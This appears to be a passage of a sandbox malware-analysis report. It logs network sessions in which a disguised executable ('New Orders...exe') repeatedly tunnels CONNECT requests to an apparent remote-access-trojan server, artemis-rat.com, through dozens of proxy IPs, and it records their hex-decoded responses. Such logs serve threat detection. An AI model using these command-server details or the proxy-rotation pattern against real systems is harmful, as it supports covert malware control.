                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1166192.168.2.95258960.188.102.225180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.364902020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1167192.168.2.953353147.75.34.86807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.365991116 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:44.671360970 CET65INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Zscaler/6.3
                                                                                        Mar 11, 2024 16:16:44.671891928 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 5c de 16 42 10 0a 7e d0 52 b5 ca cf 75 d9 ae bb 38 d6 86 4b c5 a7 9a 59 a7 24 b4 e7 94 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: lhe \B~Ru8KY$*,+0/$#('=<5/artemis-rat.com#&q|JaR<:$^}'~::!ayV: i Bi


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1168192.168.2.9532665.44.42.115583867672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.374037981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1169192.168.2.953470172.67.182.150807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.375132084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.533636093 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1170192.168.2.95261431.148.207.153807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.375339031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1171192.168.2.953340170.84.205.1741537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.378205061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1172192.168.2.953486104.16.105.15807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.378453970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.534041882 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1173192.168.2.952824146.59.18.246306737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.379106045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1174192.168.2.95343723.19.244.10910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.381314993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1175192.168.2.95338151.159.221.176103097672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.381541967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.046380043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1176192.168.2.95344851.161.99.114482357672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.381676912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.945331097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.728323936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.222273111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.132839918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.945195913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.742218971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1177192.168.2.95340693.190.141.102148887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.381839991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.675626993 CET226INHTTP/1.1 403 Forbidden
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Length: 101
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                        Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1178192.168.2.95344172.10.160.90162057672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.382139921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1179192.168.2.950902202.40.181.220312477672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.384227037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1180192.168.2.95232468.169.60.22083807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.385071039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1181192.168.2.953344103.242.119.88807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.385591030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.796983957 CET629INHTTP/1.1 407 Proxy Authentication Required
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Server: Apache
                                                                                        Proxy-Authenticate: Basic realm="Authorization"
                                                                                        Content-Length: 415
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>407 Proxy Authentication Required</title></head><body><h1>Proxy Authentication Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1182192.168.2.95354243.153.55.2054437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.386460066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1183192.168.2.95278992.204.134.38258257672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.386662006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.132822037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.204154015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1184192.168.2.95355843.153.55.2054437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.399363995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1185192.168.2.953431188.166.17.1888817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.401014090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.704863071 CET310INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 150
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1186192.168.2.953389185.220.226.1288087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.401417017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1187192.168.2.95360643.153.55.2054437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.404644966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1188192.168.2.95361143.153.55.2054437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.408418894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1189192.168.2.953427193.239.58.9280817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.414789915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1190192.168.2.95344723.137.248.197807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.422415972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.719520092 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1191192.168.2.95101751.158.98.197163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.433365107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.445281982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.539113998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
